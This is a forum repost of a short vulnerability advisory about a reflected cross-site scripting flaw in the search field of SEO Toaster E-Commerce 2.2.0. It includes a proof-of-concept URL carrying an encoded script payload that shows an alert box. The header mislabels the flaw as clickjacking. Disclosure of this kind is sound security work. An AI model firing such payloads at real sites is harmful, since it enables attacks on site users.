Jump to content
Aerosol

SEO Toaster E-Commerce 2.2.0 Cross Site Scripting

Recommended Posts

Posted

# Affected software: http://demo.seotoaster.com
# Type of vulnerability: clickjacking
# Version: E-Commerce 2.2.0
# URL: http://www.seotoaster.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Description:Free SEO Software & CMS: All in One
# Proof of concept

seo toaster search filed was vuln to xss

http://demo.seotoaster.com/search-results.html?search=%3C%2Fscript%3E%3Cscript%3Ealert%28/provensec/%29%3C%2Fscript%3E

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...